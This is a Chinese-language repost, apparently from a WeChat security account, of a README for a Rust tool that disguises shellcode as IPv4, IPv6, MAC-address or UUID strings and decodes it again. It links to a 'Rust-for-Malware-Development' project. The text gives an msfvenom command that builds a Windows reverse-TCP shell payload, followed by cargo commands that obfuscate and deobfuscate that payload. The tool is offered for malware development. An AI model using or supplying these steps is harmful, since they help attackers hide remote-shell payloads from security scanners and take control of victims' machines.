使用此代码,您可以使用 Ipv4、Ipv6、MAC、UUiD 格式对 shellcode 进行混淆和反混淆。
用途
出于安全原因。我正在删除 payload.bin。你自己生成 .bin...!
例子:
msfvenom -p windows/shell/reverse_tcp lhost=eth0 lport=4444 -f raw -o payload.bin命令格式
cargo run -- -f <file> -t <technique> -o <operation>只需运行该程序即可查看用法
cargo run
混淆有效载荷。
cargo run -- -f .payload.bin -t ipv4 -o obfuscate
对payload进行反混淆
cargo run -- -f .obfuscated_ipv4.txt -t ipv4 -o deobfuscate
所有用途
混淆命令
使用 IPv4 进行混淆
cargo run -- -f .payload.bin -t ipv4 -o obfuscate使用 IPv6 进行混淆
cargo run -- -f .payload.bin -t ipv6 -o obfuscate使用 MAC 进行混淆
cargo run -- -f .payload.bin -t mac -o obfuscate使用 UUID 进行混淆
cargo run -- -f .payload.bin -t uuid -o obfuscate反混淆命令
使用 IPv4 进行反混淆
cargo run -- -f .obfuscated_ipv4.txt -t ipv4 -o deobfuscate使用 IPv6 进行反混淆
cargo run -- -f .obfuscated_ipv6.txt -t ipv6 -o deobfuscate使用 MAC 进行反混淆
cargo run -- -f .obfuscated_mac.txt -t mac -o deobfuscate使用 UUID 进行反混淆
cargo run -- -f .obfuscated_uuid.txt -t uuid -o deobfuscateShellcode Obfuscation and Deobfuscation Techniquehttps://github.com/Whitecat18/Rust-for-Malware-Development/tree/main/obfuscation
原文始发于微信公众号(Ots安全):Shellcode 混淆和反混淆技术
- 左青龙
- 微信扫一扫
-
- 右白虎
- 微信扫一扫
-
评论